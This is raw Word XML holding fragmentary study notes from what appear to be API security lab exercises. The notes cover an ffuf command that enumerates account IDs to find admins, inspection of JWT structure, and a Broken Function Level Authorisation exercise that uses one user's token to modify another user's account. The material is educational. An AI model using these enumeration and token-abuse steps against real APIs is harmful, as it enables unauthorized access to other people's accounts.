                <v:shape id="Shape 139" o:spid="_x0000_s1061" style="position:absolute;left:3333;top:8945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" path="m47625,23813v,3156,-604,6193,-1813,9111c44604,35840,42883,38416,40650,40649v-2232,2234,-4808,3954,-7725,5162c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1814c11783,44603,9207,42883,6975,40649,4742,38416,3021,35840,1813,32924,604,30006,,26969,,23813,,20655,604,17616,1813,14699,3021,11781,4742,9205,6975,6972,9207,4739,11783,3019,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1812c35842,3019,38418,4739,40650,6972v2233,2233,3954,4809,5162,7727c47021,17616,47625,20655,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 140" o:spid="_x0000_s1062" style="position:absolute;left:4857;top:8572;width:4394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980B493" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>Do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not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impact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other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user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accounts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if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a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bug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is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found..</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 141" o:spid="_x0000_s1063" style="position:absolute;left:3333;top:1180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" path="m47625,23813v,3156,-604,6193,-1813,9111c44604,35840,42883,38416,40650,40649v-2232,2233,-4808,3954,-7725,5162c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1814c11783,44603,9207,42882,6975,40649,4742,38416,3021,35840,1813,32924,604,30006,,26969,,23813,,20653,604,17616,1813,14699,3021,11781,4742,9206,6975,6974,9207,4740,11783,3019,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1812c35842,3019,38418,4740,40650,6974v2233,2232,3954,4807,5162,7725c47021,17616,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 142" o:spid="_x0000_s1064" style="position:absolute;left:4857;top:11430;width:4507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9DA1B8E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>We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will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get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1008,1010,1012,1014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as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admin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accounts.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 143" o:spid="_x0000_s1065" style="position:absolute;left:3333;top:1466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" path="m47625,23813v,3156,-604,6192,-1813,9109c44604,35840,42883,38415,40650,40649v-2232,2232,-4808,3953,-7725,5161c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1815c11783,44602,9207,42881,6975,40649,4742,38415,3021,35840,1813,32922,604,30005,,26969,,23813,,20653,604,17616,1813,14699,3021,11781,4742,9206,6975,6974,9207,4740,11783,3019,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1812c35842,3019,38418,4740,40650,6974v2233,2232,3954,4807,5162,7725c47021,17616,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 144" o:spid="_x0000_s1066" style="position:absolute;left:4857;top:14287;width:4754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8563F4D" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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ffuf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-u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'&lt;url&lt;account=FFUZ&gt;&gt;'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-w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num.txt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-mr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'admin'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D52A96" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="702"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication 0x05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCFAC5D" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="228"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>API endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D14269A" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="210" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="3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C28E86" wp14:editId="28E27D07">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-599955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="695325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="3884" name="Group 3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695325"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="695325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647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84" style="width:22.5pt;height:54.75pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:7.5pt;mso-position-vertical-relative:text;margin-top:-47.2407pt;" coordsize="2857,6953">
                <v:shape id="Shape 146" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,605,32925,1812c35843,3020,38418,4741,40651,6975c42883,9206,44604,11781,45812,14698c47021,17616,47625,20655,47625,23813c47625,26970,47021,30006,45812,32924c44604,35840,42883,38416,40651,40649c38418,42881,35843,44602,32925,45811c30008,47019,26970,47625,23813,47625c20655,47625,17617,47019,14700,45811c11783,44602,9207,42881,6975,40649c4742,38416,3021,35840,1813,32924c604,30006,0,26970,0,23813c0,20655,604,17616,1813,14698c3021,11781,4742,9206,6975,6975c9207,4741,11783,3020,14700,1812c17617,605,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 147" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26970,47021,30006,45812,32924c44604,35840,42883,38416,40650,40649c38418,42881,35842,44602,32925,45811c30008,47019,26970,47625,23813,47625c20655,47625,17617,47019,14700,45811c11783,44602,9207,42881,6975,40649c4742,38416,3021,35840,1813,32924c604,30006,0,26970,0,23813c0,20655,604,17616,1813,14698c3021,11781,4742,9204,6975,6973c9207,4739,11783,3020,14700,1812c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1811c35842,3018,38418,4739,40650,6973c42883,9204,44604,11781,45812,14698c47021,17616,47625,20655,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 149" style="position:absolute;width:476;height:476;left:0;top:6477;" coordsize="47625,47625" path="m23813,0c26970,0,30008,605,32925,1812c35843,3020,38418,4741,40651,6975c42883,9206,44604,11781,45812,14698c47021,17618,47625,20655,47625,23813c47625,26970,47021,30007,45812,32924c44604,35841,42883,38416,40651,40650c38418,42883,35843,44603,32925,45811c30008,47020,26970,47625,23813,47625c20655,47625,17617,47020,14700,45811c11783,44603,9207,42883,6975,40650c4742,38416,3021,35841,1813,32924c604,30007,0,26970,0,23813c0,20655,604,17618,1813,14700c3021,11781,4742,9206,6975,6975c9207,4741,11783,3020,14700,1812c17617,605,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="32373F"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>1.(In terminal)Modify POST request as a new user and send it ... we get a success replay with a token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1919D257" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="338" w:lineRule="auto"/>
        <w:ind w:left="639" w:right="501" w:hanging="271"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Every token has 3 pats          - a)Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA718C5" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="84"/>
        <w:ind w:left="639" w:right="501" w:hanging="271"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>b)Body/Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6DE3C8" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="84"/>
        <w:ind w:left="639" w:right="501" w:hanging="271"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>c)Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C83B90" w14:textId="5D970FE9" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="338" w:lineRule="auto"/>
        <w:ind w:left="639" w:right="501" w:hanging="271"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">- If the signature is changed the application will give </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> token .   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A1B6DC" w14:textId="2C570A3E" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="338" w:lineRule="auto"/>
        <w:ind w:left="378" w:right="2006" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">     - **jwt.io** to see </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> web token. OR base64 </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>decodes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF114ED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3E340ED" wp14:editId="103E6D3D">
                <wp:extent cx="6581774" cy="2219444"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3882" name="Group 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2219444"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="2219444"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5505" name="Shape 5505"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2200394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95250" y="4774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242888" y="0"/>
                            <a:ext cx="116250" cy="19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E94CA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09"/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330294" y="0"/>
                            <a:ext cx="7514632" cy="19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40307" w14:textId="65EB038E" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                              <w:r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. Next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use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GET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request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and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past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the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above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token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we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will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get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the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account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7"/>
                                  <w:sz w:val="25"/>
                                </w:rPr>
                                <w:t>info.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95250" y="37159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33375" y="68591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85775" y="648575"/>
                            <a:ext cx="3872940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54B2E" w14:textId="77777777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Create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another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user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account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same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way.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95250" y="101929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0"/>
                                  <a:pt x="35843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242888" y="971550"/>
                            <a:ext cx="116250" cy="19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8D19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09"/>
                                  <w:sz w:val="2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330294" y="971550"/>
                            <a:ext cx="5578997" cy="19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EAC62" w14:textId="38C916D9" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                              <w:r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. Finally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use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one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user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4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API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token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to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modify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another</w:t>
                              </w:r>
                              <w:r w:rsidR="00000000"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32373F"/>
                                  <w:spacing w:val="13"/>
                                  <w:w w:val="1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73F"/>
                                  <w:w w:val="118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95250" y="134314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18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33375" y="165746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4" name="Shape 5574"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="581025" y="197179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28662" y="1934450"/>
                            <a:ext cx="60180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59EE" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="117"/>
                                </w:rPr>
                                <w:t>This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7"/>
                                </w:rPr>
                                <w:t>is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181249" y="1934450"/>
                            <a:ext cx="506606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6604C" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="134"/>
                                </w:rPr>
                                <w:t>BFLA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562249" y="1934450"/>
                            <a:ext cx="3147825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7B992" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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Broken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Function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Level</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:spacing w:val="-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Authorisation.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340ED" id="Group 3882" o:spid="_x0000_s1067" style="width:518.25pt;height:174.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 5505" o:spid="_x0000_s1068" style="position:absolute;top:22003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168" o:spid="_x0000_s1069" style="position:absolute;left:952;top:477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" path="m23813,v3157,,6195,603,9112,1812c35843,3020,38418,4741,40651,6975v2232,2231,3953,4806,5161,7725c47021,17616,47625,20653,47625,23813v,3156,-604,6193,-1813,9109c44604,35840,42883,38415,40651,40649v-2233,2232,-4808,3953,-7726,5161c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1815c11783,44602,9207,42881,6975,40649,4742,38415,3021,35840,1813,32922,604,30006,,26969,,23813,,20653,604,17616,1813,14700,3021,11781,4742,9206,6975,6975,9207,4741,11783,3020,14700,1812,17617,603,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 3778" o:spid="_x0000_s1070" style="position:absolute;left:2428;width:116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4/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mBvehCcgl/8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAXsCeP8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3FAE94CA" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                            <w:sz w:val="25"/>
                          </w:rPr>
                          <w:t>2</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3779" o:spid="_x0000_s1071" style="position:absolute;left:3302;width:7514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uk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MYw7pMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2E540307" w14:textId="65EB038E" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                        <w:r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. Next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use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GET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request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and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past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the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above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token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we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will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get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the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account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7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7"/>
                            <w:sz w:val="25"/>
                          </w:rPr>
                          <w:t>info.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 170" o:spid="_x0000_s1072" style="position:absolute;left:952;top:3715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" path="m23813,v3157,,6195,603,9112,1812c35843,3020,38418,4739,40651,6973v2232,2233,3953,4808,5161,7725c47021,17616,47625,20653,47625,23813v,3156,-604,6193,-1813,9109c44604,35840,42883,38416,40651,40650v-2233,2231,-4808,3952,-7726,5160c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1815c11783,44602,9207,42881,6975,40650,4742,38416,3021,35841,1813,32924,604,30006,,26969,,23813,,20653,604,17616,1813,14698,3021,11781,4742,9206,6975,6973,9207,4739,11783,3020,14700,1812,17617,603,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 171" o:spid="_x0000_s1073" style="position:absolute;left:3333;top:6859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" path="m47625,23813v,3156,-604,6193,-1813,9109c44604,35840,42883,38416,40650,40650v-2232,2233,-4808,3952,-7725,5160c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1815c11783,44602,9207,42883,6975,40650,4742,38416,3021,35840,1813,32922,604,30006,,26969,,23813,,20653,604,17616,1813,14698,3021,11779,4742,9204,6975,6973,9207,4739,11783,3020,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1811c35842,3018,38418,4739,40650,6973v2233,2231,3954,4806,5162,7725c47021,17616,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 172" o:spid="_x0000_s1074" style="position:absolute;left:4857;top:6485;width:3873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2654B2E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>Create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another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user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account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same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way.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 173" o:spid="_x0000_s1075" style="position:absolute;left:952;top:1019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" path="m23813,v3157,,6195,603,9112,1811c35843,3018,38418,4739,40651,6973v2232,2233,3953,4808,5161,7725c47021,17616,47625,20653,47625,23813v,3156,-604,6193,-1813,9109c44604,35840,42883,38415,40651,40649v-2233,2231,-4808,3951,-7726,5161c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1815c11783,44600,9207,42880,6975,40649,4742,38415,3021,35840,1813,32922,604,30006,,26969,,23813,,20653,604,17616,1813,14698,3021,11781,4742,9206,6975,6973,9207,4739,11783,3018,14700,1811,17617,603,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 3780" o:spid="_x0000_s1076" style="position:absolute;left:2428;top:9715;width:1163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Ie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lWPiHsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="1CEA8D19" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                            <w:sz w:val="25"/>
                          </w:rPr>
                          <w:t>3</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3781" o:spid="_x0000_s1077" style="position:absolute;left:3302;top:9715;width:55790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14:paraId="73DEAC62" w14:textId="38C916D9" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                        <w:r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. Finally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use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one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user</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="4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API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token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to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modify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another</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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user</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="13"/>
                            <w:w w:val="118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32373F"/>
                            <w:w w:val="118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shape id="Shape 175" o:spid="_x0000_s1078" style="position:absolute;left:952;top:1343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" path="m23813,v3157,,6195,603,9112,1811c35843,3018,38418,4741,40651,6975v2232,2232,3953,4806,5161,7723c47021,17616,47625,20653,47625,23813v,3156,-604,6193,-1813,9111c44604,35841,42883,38415,40651,40649v-2233,2232,-4808,3953,-7726,5161c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1815c11783,44602,9207,42881,6975,40649,4742,38415,3021,35841,1813,32924,604,30006,,26969,,23813,,20653,604,17616,1813,14698,3021,11781,4742,9207,6975,6975,9207,4741,11783,3018,14700,1811,17617,603,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 176" o:spid="_x0000_s1079" style="position:absolute;left:3333;top:1657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" path="m47625,23813v,3156,-604,6193,-1813,9111c44604,35841,42883,38416,40650,40650v-2232,2233,-4808,3952,-7725,5160c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1815c11783,44602,9207,42883,6975,40650,4742,38416,3021,35841,1813,32924,604,30006,,26969,,23813,,20653,604,17616,1813,14700,3021,11781,4742,9206,6975,6975,9207,4741,11783,3020,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1812c35842,3020,38418,4741,40650,6975v2233,2231,3954,4806,5162,7723c47021,17616,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 5574" o:spid="_x0000_s1080" style="position:absolute;left:5810;top:19717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" path="m,l47625,r,47625l,47625,,e" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 178" o:spid="_x0000_s1081" style="position:absolute;left:7286;top:19344;width:601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21F59EE" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>This</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F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7"/>
                          </w:rPr>
                          <w:t>is</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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82" style="position:absolute;left:11812;top:19344;width:506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446604C" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="134"/>
                          </w:rPr>
                          <w:t>BFLA</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 180" o:spid="_x0000_s1083" style="position:absolute;left:15622;top:19344;width:3147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647B992" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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Broken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Function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Level</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="-1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Authorisation.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CB45E" w14:textId="7BAF4225" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Authentication 0x06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460660C" w14:textId="49F4DFBE" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="198"/>
        <w:ind w:left="115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F165EC" wp14:editId="2B0D8AC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-591304</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="771525" cy="2162175"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4246" name="Group 4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162175"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="771525" cy="2162175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5"/>
                                  <a:pt x="38418" y="4736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7" name="Shape 5677"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="485775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8" name="Shape 5678"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="485775" y="9429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9" name="Shape 5679"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="485775" y="1228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0" name="Shape 5680"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="485775" y="1514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1" name="Shape 5681"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="723900" y="1828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2" name="Shape 5682"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="723900" y="2114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4246" style="width:60.75pt;height:170.25pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:7.5pt;mso-position-vertical-relative:text;margin-top:-46.5594pt;" coordsize="7715,21621">
                <v:shape id="Shape 211" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,602,32925,1809c35843,3015,38418,4736,40651,6972c42883,9204,44604,11778,45812,14697c47021,17614,47625,20651,47625,23813c47625,26967,47021,30004,45812,32924c44604,35841,42883,38416,40651,40649c38418,42878,35843,44599,32925,45808c30008,47017,26970,47622,23813,47625c20655,47622,17617,47017,14700,45808c11783,44599,9207,42878,6975,40649c4742,38416,3021,35841,1813,32924c604,30004,0,26967,0,23813c0,20651,604,17614,1813,14697c3021,11778,4742,9204,6975,6972c9207,4736,11783,3018,14700,1811c17617,605,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
